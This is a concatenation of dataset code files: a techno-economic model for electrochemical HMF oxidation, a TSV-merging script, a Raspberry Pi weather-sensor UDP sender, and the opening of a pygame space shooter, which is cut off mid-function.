[kg/L]\n# hmf_MW = 126.110 # [g/mol]\n# electrons_per_molecule = 6\n\n# # Crystallization Parameters\n# crystal_capcity_scale_factor = 0.7\n# crystal_reference_cost = 159000 # [$]\n# crystal_reference_capacity = 1427000.00 # [kg/day]\n# crystal_reference_power = (7.1 * 1000) / (1427000 / 24) # [kWh/kg]\n\n# # Depreciation\n# dep = [0.10, 0.18, 0.144, 0.1152, 0.0922, 0.0737,\n# 0.0655, 0.0655, 0.0656, 0.0655, 0.0328]\n\n# _______________________ Calculations _________________________\n\n\ndef HMFOR_TEA(product_production: float, product_price: float, operating_time: float,\n electricity_price: float, h2_price: float, water_price: float, hmf_price: float,\n electrolyzer_reference_cost: float, income_tax: float, interest_rate: float, plant_lifetime: float,\n current_density: float, cell_voltage: float, faradaic_efficiency: float, fdca_yield: float, electrolyte_density: float):\n # This function calculates the TEA for the HMF OR reaction\n\n # Constants\n product_MW = 156.093 # [g/mol]\n product_density = 1.6 # [kg/L]\n hmf_MW = 126.110 # [g/mol]\n electrons_per_molecule = 6\n\n # Crystallization Parameters\n crystal_capcity_scale_factor = 0.7\n crystal_reference_cost = 159000 # [$]\n crystal_reference_capacity = 1427000.00 # [kg/day]\n crystal_reference_power = (7.1 * 1000) / (1427000 / 24) # [kWh/kg]\n\n # Depreciation\n dep = [0.10, 0.18, 0.144, 0.1152, 0.0922, 0.0737,\n 0.0655, 0.0655, 0.0656, 0.0655, 0.0328]\n\n # Electrolyzer Banalnce\n current_needed = (product_production / 86400) * (1000 / product_MW) * \\\n electrons_per_molecule * 96485 / faradaic_efficiency # [A]\n electrolyzer_area = current_needed / (current_density * 10 ** 4) # [m^2]\n power_needed = current_needed * cell_voltage / (10 ** 6)\n hmf_needed = (current_needed * faradaic_efficiency * hmf_MW * # [MW]\n 86400 / (electrons_per_molecule * 96485*1000)) / (fdca_yield) # [kd/day]\n\n electrolyte_flow_rate = (\n (product_production / product_density) / 0.1) * electrolyte_density # [kg/day]\n o2_flow_rate = current_needed * 3/2 * \\\n (1-faradaic_efficiency) / (6 * 96485) * \\\n 0.016 * 86400 # [kg/day]\n h2_flow_rate = current_needed * faradaic_efficiency * 3 / 6 / 96485 * 0.002 * 86400\n h2o_inlet_flow_rate = current_needed * \\\n faradaic_efficiency * 6 / 6 / 96485 * \\\n 0.018 * 86400 # [kg/day]\n h2o_outlet_flow_rate = current_needed * \\\n 
faradaic_efficiency * 4 / 6 / 96485 * \\\n 0.018 * 86400 # [kg/day]\n\n total_liquid_flow_rate = product_production + \\\n electrolyte_flow_rate + \\\n h2o_outlet_flow_rate # [kg/day]\n\n fdca_weight_fraction = product_production / total_liquid_flow_rate\n h2o_electrolyzer_area = current_needed / (2 * 10 ** 4)\n\n # Captial Costs\n\n electrolyzer_captital = electrolyzer_reference_cost * \\\n (electrolyzer_area + h2o_electrolyzer_area) # [$]\n\n crystal_captital = crystal_reference_cost * \\\n (total_liquid_flow_rate /\n crystal_reference_capacity) ** crystal_capcity_scale_factor # [$]\n\n plant_capital = (electrolyzer_captital +\n crystal_captital) * 0.45 / 0.55 # [$]\n\n total_capital = plant_capital + \\\n electrolyzer_captital + crystal_captital # [$]\n\n # Operating Costs\n electricity_operating = power_needed * \\\n electricity_price * 1000 * 24 # [$/day]\n maintenance_operating = (\n crystal_captital + electrolyzer_captital) * 0.025 / operating_time # [$/day]\n crystal_operating = total_liquid_flow_rate * \\\n electricity_price * crystal_reference_power # [$/day]\n hmf_operating = hmf_needed * hmf_price # [$/day]\n water_operating = water_price * h2o_inlet_flow_rate # [$/day]\n total_operating = electricity_operating + maintenance_operating + \\\n crystal_operating + hmf_operating + water_operating # [$/day]\n\n # Income\n product_income = product_production * \\\n product_price / 1000 + h2_flow_rate * h2_price # [$/day]\n annual_profit = (product_income - total_operating) * operating_time\n\n payback_time = total_capital / annual_profit # [years]\n\n # NPV Calculations\n NPV = -total_capital - 0.05 * total_capital\n discount_facor = 1\n\n for i in range(1, int(plant_lifetime) + 1):\n discount_facor = discount_facor / (1 + interest_rate)\n CF = annual_profit * (1-income_tax)\n if i <= len(dep):\n CF += dep[i-1] * total_capital * income_tax\n NPV += CF * discount_facor\n\n annual_op_costs = np.array([electricity_operating, maintenance_operating,\n crystal_operating, water_operating, hmf_operating]) * operating_time\n return([NPV, payback_time, product_income, annual_op_costs, [electrolyzer_captital, crystal_captital, plant_capital]])\n\n\ndef HMFOR_plots(HMFOR_inputs, cd_lower, cd_upper, cv_lower, cv_upper, FE_lower, FE_upper, yield_lower, yield_upper):\n # Generates plots for HMFOR reaction\n\n [NPV_base, payback_time_base, product_income, op_costs,\n cap_costs] = HMFOR_TEA(*HMFOR_inputs)\n\n # ________Pie Charts__________\n\n # Operating Costs\n op_cost_pie = pygal.Pie()\n op_cost_pie.title = 'Annual Operating Cost Breakdown ($)'\n op_cost_pie.add('Electricity', round(op_costs[0], 2))\n op_cost_pie.add('Maintenance', round(op_costs[1], 2))\n op_cost_pie.add('Crystallization', round(op_costs[2], 2))\n op_cost_pie.add('Water', round(op_costs[3], 2))\n op_cost_pie.add('HMF input', round(op_costs[4], 2))\n\n op_cost_pie_data = op_cost_pie.render_data_uri()\n\n # Operating Costs without HMF\n op_cost_pie_no_hmf = pygal.Pie()\n op_cost_pie_no_hmf.title = 'Annual Operating Cost Breakdown Excluding HMF ($)'\n op_cost_pie_no_hmf.add('Electricity', round(op_costs[0], 2))\n op_cost_pie_no_hmf.add('Maintenance', round(op_costs[1], 2))\n op_cost_pie_no_hmf.add('Crystallization', round(op_costs[2], 2))\n op_cost_pie_no_hmf.add('Water', round(op_costs[3], 2))\n\n op_cost_pie_no_hmf_data = op_cost_pie_no_hmf.render_data_uri()\n\n # Capital Costs\n cap_cost_pie = pygal.Pie()\n cap_cost_pie.title = 'Capital Cost Breakdown ($)'\n cap_cost_pie.add('Electrolyzer', round(cap_costs[0], 2))\n 
cap_cost_pie.add('Crystallizer', round(cap_costs[1], 2))\n cap_cost_pie.add('Balance', round(cap_costs[2], 2))\n\n cap_cost_pie_data = cap_cost_pie.render_data_uri()\n\n # ________Sensitivity Analysis Charts__________\n\n # Set up scenarios (+/- 10%)\n\n sa_vars = ['Electrolyzer Cost', 'Faradaic Efficiency', 'FDCA Yield',\n 'Cell Voltage', 'Current Density', 'HMF Price', 'Electricity Price']\n\n sa_lower_vars = [[0.9*HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], 0.9*HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], 0.9*HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], 0.9*HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n 0.9*HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], 0.9*HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], 0.9*HMFOR_inputs[3]],\n ]\n\n sa_upper_vars = [[1.1*HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], 1.1*HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], 1.1*HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], 1.1*HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n 1.1*HMFOR_inputs[11], HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], 1.1*HMFOR_inputs[6], HMFOR_inputs[3]],\n\n [HMFOR_inputs[7], HMFOR_inputs[13], HMFOR_inputs[14], HMFOR_inputs[12],\n HMFOR_inputs[11], HMFOR_inputs[6], 1.1*HMFOR_inputs[3]],\n ]\n\n sa_lower = []\n for i in range(0, len(sa_lower_vars)):\n results = HMFOR_TEA(*HMFOR_inputs[:3], sa_lower_vars[i][6], *HMFOR_inputs[4:6], sa_lower_vars[i][5], sa_lower_vars[i][0],\n *HMFOR_inputs[8:11], sa_lower_vars[i][4], sa_lower_vars[i][3], sa_lower_vars[i][1], sa_lower_vars[i][2], HMFOR_inputs[-1])\n sa_lower.append(results[0] / NPV_base-1)\n\n sa_upper = []\n for i in range(0, len(sa_upper_vars)):\n results = HMFOR_TEA(*HMFOR_inputs[:3], sa_upper_vars[i][6], *HMFOR_inputs[4:6], sa_upper_vars[i][5], sa_upper_vars[i][0],\n *HMFOR_inputs[8:11], sa_upper_vars[i][4], sa_upper_vars[i][3], sa_upper_vars[i][1], sa_upper_vars[i][2], HMFOR_inputs[-1])\n sa_upper.append(results[0] / NPV_base-1)\n\n num_vars = len(sa_vars)\n\n # bars centered on the y axis\n pos = np.arange(num_vars) + .5\n\n # make the left and right axes\n fig = Figure()\n ax_lower = fig.add_axes([0.05, 0.1, 0.35, 0.8])\n ax_upper = fig.add_axes([0.6, 0.1, 0.35, 0.8])\n\n # just tick on the top\n ax_lower.xaxis.set_ticks_position('top')\n ax_upper.xaxis.set_ticks_position('top')\n\n # Set figure title\n fig.suptitle('Sensitivity Analysis')\n\n # set bar colors\n c_lower = []\n c_upper = []\n\n for i in range(0, num_vars):\n if sa_lower[i] < 
0:\n c_lower.append('red')\n else:\n c_lower.append('green')\n\n if sa_upper[i] < 0:\n c_upper.append('red')\n else:\n c_upper.append('green')\n\n # make the lower graph\n ax_lower.barh(pos, [abs(ele) for ele in sa_lower], align='center', color=c_lower,\n height=0.5, edgecolor='None')\n ax_lower.set_yticks([])\n ax_lower.invert_xaxis()\n\n # make the upper graph\n ax_upper.barh(pos, [abs(ele) for ele in sa_upper], align='center', color=c_upper,\n height=0.5, edgecolor='None')\n ax_upper.set_yticks([])\n\n # we want the labels to be centered in the fig coord system and\n # centered w/ respect to the bars so we use a custom transform\n transform = transforms.blended_transform_factory(\n fig.transFigure, ax_upper.transData)\n for i, label in enumerate(sa_vars):\n ax_upper.text(0.5, i+0.5, label, ha='center', va='center',\n transform=transform)\n\n # the axes titles are in axes coords, so x=0, y=1.025 is on the left\n # side of the axes, just above, x=1.0, y=1.025 is the right side of the\n # axes, just above\n ax_upper.set_title('+10%', x=-0.15, y=0.97, fontsize=12)\n ax_lower.set_title('-10%', x=1.15, y=0.97, fontsize=12)\n\n # adding the annotations\n for i in range(0, num_vars):\n ax_upper.annotate(str(round(abs(sa_upper[i])*100, 2)) + '%', xy=(0.00001, 0.5 + i),\n xycoords='data',\n xytext=(16, 0), textcoords='offset points',\n size=10,\n va='center')\n ax_lower.annotate(str(round(abs(sa_lower[i])*100, 2)) + '%', xy=(max([abs(ele) for ele in sa_lower])/2, 0.5 + i),\n xycoords='data',\n xytext=(16, 0), textcoords='offset points',\n size=10,\n va='center')\n\n SA_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(SA_output)\n\n # ________Color Scatter Charts__________\n\n scatter_step = 75\n\n # Current Density (x) vs Voltage (y)\n\n x = []\n y = []\n cd_cv_npv = []\n cd = cd_lower\n cv = cv_lower\n cd_step = (cd_upper-cd_lower)/scatter_step\n cv_step = (cv_upper-cv_lower)/scatter_step\n\n for i in range(0, scatter_step):\n for j in range(0, scatter_step):\n x.append(cd)\n y.append(cv)\n results = HMFOR_TEA(*HMFOR_inputs[:11], cd, cv, *HMFOR_inputs[13:])\n cd_cv_npv.append(results[0])\n cv += cv_step\n cd += cd_step\n cv = cv_lower\n\n fig = Figure()\n\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y, s=3, c=cd_cv_npv)\n ax.scatter(HMFOR_inputs[11], HMFOR_inputs[12],\n edgecolors='black', s=8, c='b')\n ax.set_xlabel('Current Density $[A/cm^2]$')\n ax.set_ylabel('Cell Voltage $[V]$')\n ax.set_title('Current Density vs Cell Voltage')\n ax.set_xlim(cd_lower, cd_upper)\n ax.set_ylim(cv_lower, cv_upper)\n ax.set_xticks(np.arange(cd_lower, cd_upper +\n 10 ** -8, (cd_upper-cd_lower)/4))\n ax.set_yticks(np.arange(cv_lower, cv_upper +\n 10 ** -8, (cv_upper-cv_lower)/4))\n\n fig.colorbar(im, ax=ax, label='Net Present Value [$]')\n\n cd_cv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(cd_cv_output)\n\n # FE (x) vs Voltage (y)\n\n x = []\n y = []\n fe_cv_npv = []\n FE = FE_lower\n cv = cv_lower\n FE_step = (FE_upper-FE_lower)/scatter_step\n cv_step = (cv_upper-cv_lower)/scatter_step\n\n for i in range(0, scatter_step):\n for j in range(0, scatter_step):\n x.append(FE)\n y.append(cv)\n results = HMFOR_TEA(*HMFOR_inputs[:12], cv, FE, *HMFOR_inputs[14:])\n fe_cv_npv.append(results[0])\n cv += cv_step\n FE += FE_step\n cv = cv_lower\n\n fig = Figure()\n\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y, s=3, c=fe_cv_npv)\n ax.scatter(HMFOR_inputs[13], HMFOR_inputs[12],\n edgecolors='black', s=8, c='b')\n ax.set_xlabel('Faradaic Efficiency')\n ax.set_ylabel('Cell Voltage $[V]$')\n 
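\n    # Each of the three parameter maps in this section uses the same sweep:\n    # walk a scatter_step x scatter_step grid over two lab variables, re-run\n    # HMFOR_TEA at every grid point, and colour the scatter by NPV. A minimal\n    # sketch of the idea (p1_grid/p2_grid are illustrative names, not defined\n    # in this file):\n    #   for p1 in p1_grid:\n    #       for p2 in p2_grid:\n    #           npv = HMFOR_TEA(*HMFOR_inputs[:11], p1, p2, *HMFOR_inputs[13:])[0]\n    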
ax.set_title('Faradaic Efficienct vs Cell Voltage')\n ax.set_xlim(FE_lower, FE_upper)\n ax.set_ylim(cv_lower, cv_upper)\n ax.set_xticks(np.arange(FE_lower, FE_upper +\n 10 ** -8, (FE_upper-FE_lower)/4))\n ax.set_yticks(np.arange(cv_lower, cv_upper +\n 10 ** -8, (cv_upper-cv_lower)/4))\n\n fig.colorbar(im, ax=ax, label='Net Present Value [$]')\n\n fe_cv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(fe_cv_output)\n\n # Yield (x) vs Voltage (y)\n\n x = []\n y = []\n yld_cv_npv = []\n yld = yield_lower\n cv = cv_lower\n yld_step = (yield_upper-yield_lower)/scatter_step\n cv_step = (cv_upper-cv_lower)/scatter_step\n\n for i in range(0, scatter_step):\n for j in range(0, scatter_step):\n x.append(yld)\n y.append(cv)\n results = HMFOR_TEA(\n *HMFOR_inputs[:12], cv, HMFOR_inputs[13], yld, HMFOR_inputs[-1])\n yld_cv_npv.append(results[0])\n cv += cv_step\n yld += yld_step\n cv = cv_lower\n\n fig = Figure()\n\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y, s=3, c=yld_cv_npv)\n ax.scatter(HMFOR_inputs[14], HMFOR_inputs[12],\n edgecolors='black', s=8, c='b')\n ax.set_xlabel('FDCA Yield')\n ax.set_ylabel('Cell Voltage $[V]$')\n ax.set_title('FDCA Yield vs Cell Voltage')\n ax.set_xlim(yield_lower, yield_upper)\n ax.set_ylim(cv_lower, cv_upper)\n ax.set_xticks(np.arange(yield_lower, yield_upper +\n 10 ** -8, (yield_upper-yield_lower)/4))\n ax.set_yticks(np.arange(cv_lower, cv_upper +\n 10 ** -8, (cv_upper-cv_lower)/4))\n\n fig.colorbar(im, ax=ax, label='Net Present Value [$]')\n\n yld_cv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(yld_cv_output)\n\n # Current Density vs NPV\n\n x = []\n y = []\n cd = cd_lower\n cd_step = (cd_upper-cd_lower)/scatter_step\n\n for i in range(0, scatter_step):\n x.append(cd)\n results = HMFOR_TEA(*HMFOR_inputs[:11], cd, cv, *HMFOR_inputs[13:])\n y.append(results[0])\n cd += cd_step\n\n # Using Pygal\n # xy_chart = pygal.XY(stroke=False)\n # xy_chart.title = 'Current Density vs NPV ($)'\n # xy_chart.add('Current Density $[A/cm^2]$',\n # [(x[i], y[i]) for i in range(0, len(x))])\n\n # cd_npv = xy_chart.render_data_uri()\n\n fig = Figure()\n ax = fig.add_subplot(111)\n im = ax.scatter(x, y)\n ax.set_title('Current Density vs NPV')\n ax.set_xlabel('Current Density $[A/cm^2]$')\n ax.set_ylabel('Net Present Value [$]')\n\n cd_npv_output = io.StringIO()\n FigureCanvasSVG(fig).print_svg(cd_npv_output)\n\n return [op_cost_pie_data, op_cost_pie_no_hmf_data, cap_cost_pie_data, SA_output, cd_cv_output, fe_cv_output, yld_cv_output, cd_npv_output]\n\n\nHMFOR_inputs = [product_production, product_price, operating_time,\n electricity_price, h2_price, water_price, hmf_price,\n electrolyzer_reference_cost, income_tax, interest_rate, plant_lifetime,\n current_density, cell_voltage, faradaic_efficiency, fdca_yield, electrolyte_density]\n\n# print(HMFOR_TEA(*HMFOR_inputs))\n\n# HMFOR_plots(HMFOR_inputs, 0.02, 0.06, 1, 2, 0.8, 1, 0.8, 1)\n","repo_name":"danielschwartz3/TEA","sub_path":"TEA_HMFOR.py","file_name":"TEA_HMFOR.py","file_ext":"py","file_size_in_byte":19205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2082369799","text":"import os\nimport csv \nimport json\nfrom combine import write_posts\n\ndef add_posts(file_path, post_posts, post_keys):\n num_duplicates =0\n post_file = open(file_path,'r',encoding='utf-8')\n tsv_reader = csv.reader(post_file,delimiter=\"\\t\")\n for line in tsv_reader:\n \n name=line[0]\n title=line[1]\n if len(line) == 3:\n topic=line[2]\n else:\n topic = ''\n if name not in 
post_keys:\n post = {\n 'name':name,\n 'title':title,\n 'coding': topic\n }\n post_keys.add(name)\n post_posts.append(post)\n else:\n num_duplicates +=1\n return num_duplicates\n\ndef main():\n\n file_list = ['annotated-1.tsv','annotated-2.tsv','annotated-3.tsv']\n base_path = os.path.join('..','data')\n\n path_list = []\n for path in file_list:\n file_path = os.path.join(base_path,path)\n path_list.append(file_path)\n\n post_posts = []\n post_keys = set()\n num_duplicates = 0\n \n for file_path in path_list:\n num_duplicates +=add_posts(file_path, post_posts, post_keys)\n \n output_file_path = os.path.join('..','all_posts','combined_annotated.tsv')\n write_posts(post_posts, output_file_path)\n\nif __name__ == '__main__':\n main()","repo_name":"Alexander-Cui/Comp-598-project","sub_path":"scripts/combine_annotated.py","file_name":"combine_annotated.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44041118830","text":"#!/usr/bin/python3\nimport socket\nimport adafruit_dht # pip3 install adafruit-circuitpython-dht\nimport adafruit_mpl115a2 # pip3 install adafruit-circuitpython-mpl115a2\nimport board\nimport busio\nfrom time import sleep\n\ni2c = busio.I2C(board.SCL, board.SDA)\nmpl = adafruit_mpl115a2.MPL115A2(i2c)\ndht = adafruit_dht.DHT22(board.D4, use_pulseio=False)\n\nurl = \"192.168.X.X\" #The IP for the PiRitos Flask server\nport = 5006 #Not the same port as socketio... this is for UDP\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsleep(2)\n\ntries = 0\nwhile True:\n try:\n humidity = dht.humidity\n temperature = dht.temperature # or mpl.temperature\n pressure = mpl.pressure\n if temperature is None or humidity is None or pressure is None:\n tries += 1\n sleep(2)\n continue\n message = str(round(temperature,2)) + \",\" + str(round(humidity,2)) + \",\" + str(round(pressure,2))\n sock.sendto(bytes(message, \"utf-8\"), (url, port))\n print(message)\n tries = 0\n except RuntimeError as error:\n # Errors happen fairly often, DHT's are hard to read, just keep going\n print(error.args[0])\n sleep(2)\n continue\n except Exception as error:\n dht.exit()\n raise error\n if tries == 0: sleep(120)\n","repo_name":"monkeymademe/piritos","sub_path":"pimeteo-code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"19"} +{"seq_id":"38636701701","text":"import pygame as pg\r\nfrom pygame import mixer\r\nimport pygame.freetype as freetype\r\n\r\nimport sys\r\nimport random\r\nimport math\r\nimport datetime\r\nimport pickle\r\nimport os\r\nimport itertools\r\nimport webbrowser\r\n\r\n#iInitialize all imported pygame modules\r\npg.init()\r\n\r\ninfo = pg.display.Info()\r\nscreen_width = info.current_w #1536, Without dpi awareness\r\nscreen_height = info.current_h #864\r\n\r\n#Initial window dimensions\r\nif screen_width >= 1536:\r\n window_width, window_height = 1280, 720\r\nelse:\r\n window_width, window_height = 1152, 648\r\n\r\n#Pygame window\r\nflags = pg.RESIZABLE #| pg.FULLSCREEN\r\nwindow = pg.display.set_mode((window_width, window_height), flags)\r\nwindow_rect = window.get_rect()\r\n\r\n#Setting window title bar properties\r\npg.display.set_caption('Space Overkill')\r\nicon = pg.image.load('.\\\\resources\\\\images\\\\player\\\\battleship32.png')\r\npg.display.set_icon(icon)\r\n\r\n#Loading and playing game 
music\r\nmixer.music.load(r'.\resources\sounds\background1-short.wav')\r\nmixer.music.play(-1)\r\n#print(mixer.music.get_volume())#0.9921875\r\nmixer.music.set_volume(0.70)
\r\n\r\n#Setting different sound channels for simultaneous playback\r\nnum_channels = 10\r\nmixer.set_num_channels(num_channels)\r\nchannels = []
\r\n\r\nfor i in range(num_channels):\r\n    channels.append(mixer.Channel(i))
\r\n\r\n\r\n#Loading Screen\r\nwindow.fill((255,255,255))\r\nbackground_img = pg.image.load('.\\\\resources\\\\images\\\\background\\\\background.png').convert_alpha()\r\nbackground_over = pg.image.load(r'.\resources\images\text-background\game-intro.png').convert_alpha()\r\nload_font = pg.font.Font(r'.\resources\fonts\Open_Sans\OpenSans-Bold.ttf', 120)\r\nload_text = load_font.render('Loading'.upper(), True, (0,0,0))\r\nload_text_rect = load_text.get_rect(center=(window_width/2, window_height/2))\r\nwindow.blit(background_img, (0,0))\r\nwindow.blit(background_over, (0,0))\r\nwindow.blit(load_text, load_text_rect)\r\npg.display.update()
\r\n\r\n\r\n#Reading highscore file\r\ntry:\r\n    with open('highscores.pickle', 'rb') as fh:\r\n        hs_dict = pickle.load(fh)\r\nexcept FileNotFoundError:\r\n    hs_dict = {}
\r\n\r\n#Player properties and functions\r\nplayer_img = pg.image.load('.\\\\resources\\\\images\\\\player\\\\battleship100.png').convert_alpha()\r\nplayer_img_size = player_img_w, player_img_h = player_img.get_size()\r\nplayer_rect = player_img.get_rect()\r\nplayerX = window_width/2 - player_img_w/2\r\nplayerY = ((window_height/player_img_h)-1.5)*player_img_h\r\n#Here the constant (1.5) represents the padding of the player image from the\r\n#bottom of the window, in multiples of the player image height\r\nplayerX_change = 0\r\nplayerY_change = 0\r\ncur_player_x = playerX + playerX_change\r\ncur_player_y = playerY + playerY_change\r\nplayer_rect.x = cur_player_x\r\nplayer_rect.y = cur_player_y
\r\n\r\nplayer_xspeed = 0.7\r\nplayer_yspeed = 0.5
\r\n\r\nplayer_max_health = 5\r\nplayer_health = player_max_health\r\nplayer_health_img1 = pg.image.load('.\\\\resources\\\\images\\\\player\\\\heart-fill32.png')\r\nplayer_health_img2 = pg.image.load('.\\\\resources\\\\images\\\\player\\\\heart-empty32.png')\r\nplayer_health_rects = []
\r\n\r\ndef update_player_health_rect():\r\n    global window_width, player_health_rects\r\n\r\n    player_health_rects.clear()\r\n\r\n    start = (window_width/2) - (((player_max_health-1)*42)+32)/2\r\n\r\n    for i in range(player_max_health):\r\n        player_health_rects.append(pg.Rect(start+42*i, 10, 32, 32))
\r\n\r\nupdate_player_health_rect()
\r\n\r\ndef draw_player():#xchange, ychange\r\n    global player_img, player_img_size, player_img_w, player_img_h, player_rect\r\n    global playerX, playerY, playerX_change, playerY_change, cur_player_x, cur_player_y\r\n\r\n    cur_player_x += playerX_change\r\n    cur_player_y += playerY_change\r\n\r\n    #Setting player boundaries\r\n    if cur_player_x <= 2:\r\n        cur_player_x = 2\r\n    elif cur_player_x >= window_width-player_img_w-2:\r\n        cur_player_x = window_width-player_img_w-2\r\n\r\n    if cur_player_y <= ((window_height/player_img_h)-3)*player_img_h:\r\n        cur_player_y = ((window_height/player_img_h)-3)*player_img_h\r\n    elif cur_player_y >= window_height-player_img_h-2:\r\n        cur_player_y = window_height-player_img_h-2\r\n\r\n    player_rect.x = cur_player_x\r\n    player_rect.y = cur_player_y\r\n\r\n    window.blit(player_img, (cur_player_x, cur_player_y))\r\n\r\n    for i, rect in zip(range(player_health), player_health_rects):\r\n        window.blit(player_health_img1, rect)\r\n\r\n    for i, rect in 
zip(range(player_max_health-player_health), player_health_rects[::-1]):\r\n window.blit(player_health_img2, rect)\r\n\r\ndef player_update(event):\r\n global cur_player_x, cur_player_y, player_rect, window_width, window_height\r\n\r\n player_rect.center = (event.w/window_width*player_rect.centerx,\r\n event.h/window_height*player_rect.centery)\r\n cur_player_x, cur_player_y = player_rect.left, player_rect.top\r\n\r\n if powerups.pcollected == 'freeze':\r\n powerups.powerups['freeze']['rect'].center = player_rect.center\r\n\r\n\r\n#Small enemy properties and functions\r\nnum_enemy_small = 8\r\nenemy_small_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\aircraft80.png').convert_alpha()\r\nenemy_small_img_size = enemy_small_img_w, enemy_small_img_h = enemy_small_img.get_size()\r\nenemy_small_xspeed = 0.5\r\nenemy_small_yspeed = 0.1\r\nenemy_small = {}\r\n\r\nenemy_small_laser = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(90)9x24.png')\r\nenemy_small_laser_xspeed = 0\r\nenemy_small_laser_yspeed = 0.5\r\nenemy_small_laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser3.wav')\r\nenemy_small_killed = 0\r\n\r\n#Dict to hold only thhose enemies which are visible on screen. This is used to draw small enemies\r\n#when its time to spawn medium/large enemy on reaching particular score\r\nenemy_small_last = {}\r\n\r\nexplosion_img = [pg.image.load(r'.\\resources\\images\\enemy\\explosion80.png').convert_alpha(),\r\n pg.image.load(r'.\\resources\\images\\enemy\\explosion(1)80.png').convert_alpha()]\r\n\r\n\r\ndef init_enemy_small_img():\r\n global enemy_small, enemy_small_img\r\n \r\n for i in range(1, num_enemy_small+1):\r\n enemy_small['enemy'+str(i)] = {}\r\n enemy_small['enemy'+str(i)]['img'] = enemy_small_img #pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\aircraft80.png')\r\n enemy_small['enemy'+str(i)]['rect'] = enemy_small['enemy'+str(i)]['img'].get_rect()\r\n \r\ndef init_enemy_small_pos():\r\n global enemy_small, num_enemy_small, enemy_small_xspeed, enemy_small_yspeed\r\n global window_width, enemy_small_img_w, enemy_small_laser\r\n\r\n for i in range(1, num_enemy_small+1):\r\n enemy_small['enemy'+str(i)]['enemy_smallX_change'] = random.choice([enemy_small_xspeed, -enemy_small_xspeed])\r\n enemy_small['enemy'+str(i)]['enemy_smallY_change'] = enemy_small_yspeed\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_x'] = random.randint(2, window_width-enemy_small_img_w-2)\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_y'] = -300 - (120 * (i-1))\r\n enemy_small['enemy'+str(i)]['rect'].x = enemy_small['enemy'+str(i)]['cur_enemy_small_x']\r\n enemy_small['enemy'+str(i)]['rect'].y = enemy_small['enemy'+str(i)]['cur_enemy_small_y']\r\n enemy_small['enemy'+str(i)]['alive'] = True\r\n enemy_small['enemy'+str(i)]['explosion_time'] = 60\r\n enemy_small['enemy'+str(i)]['laser_draw'] = False\r\n enemy_small['enemy'+str(i)]['laser_rect'] = enemy_small_laser.get_rect()\r\n\r\n #print(enemy_small)\r\n\r\ninit_enemy_small_img()\r\ninit_enemy_small_pos()\r\n\r\ndef draw_enemy_small(dt=1):\r\n global enemy_small, enemy_small_xspeed, enemy_small_yspeed, lvl_value\r\n global powerups, enemy_small_laser_sound, channels\r\n\r\n for enemy in enemy_small:\r\n if powerups.pcollected != 'freeze':\r\n if enemy_small[enemy]['cur_enemy_small_x'] <= 2:\r\n enemy_small[enemy]['enemy_smallX_change'] = enemy_small_xspeed\r\n enemy_small[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n elif enemy_small[enemy]['cur_enemy_small_x'] >= window_width - enemy_small_img_w - 2:\r\n 
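\r\n                # Right edge reached: mirror the horizontal speed so the\r\n                # craft bounces back while keeping its slow downward drift\r\n                # (the left-edge branch above is symmetric).\r\n                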
